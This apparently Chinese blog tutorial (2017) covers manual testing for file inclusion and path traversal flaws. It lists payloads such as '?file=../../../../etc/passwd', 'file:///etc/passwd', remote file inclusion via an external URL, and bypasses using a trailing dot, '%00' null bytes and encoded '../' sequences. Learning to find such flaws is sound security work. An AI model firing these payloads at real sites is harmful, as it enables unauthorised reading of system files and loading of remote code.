手动挖掘漏洞（二）

时间：2017-04-15 12:04:16 阅读：110 评论：0 收藏：0 [点我收藏+]

漏洞特征

?page=a.php

?home=b.html

?file=content

经典测试方式

?file=../../../../etc/passwd 根据相对路径加载文件

?file=/etc/passwd 根据绝对路径加载文件

?page=file:///etc/passwd

?home=main.cgi

?page=http://www.a.com/1.php 根据外部url,加载远程文件

http://1.1.1.1/../../../../dir/file.txt

根据外部url加载远程文件

有时候加载文件时，比如

?file=/etc/passwd

可能会提示/etc/passwd.php文件找不到，这是因为网站开发者可能用了某些过滤机制在文件名后面自动补全为.php文件，我们只时想找passwd这个文件并不希望去找一个.php文件，这时我们需要绕过字符的过滤，php5.3以前，通过一些简单地修改就能绕过过滤：

加“.” : ?file=/etc/passwd.

加“%00” ： ?file=/etc/passwd%00 ，%00表示null

../url编码为%2e%2e%2f

..\编码为%2e%2e%5c

../双层编码为%252e%252e%255c

原文地址：http://www.cnblogs.com/zylq-blog/p/6713372.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行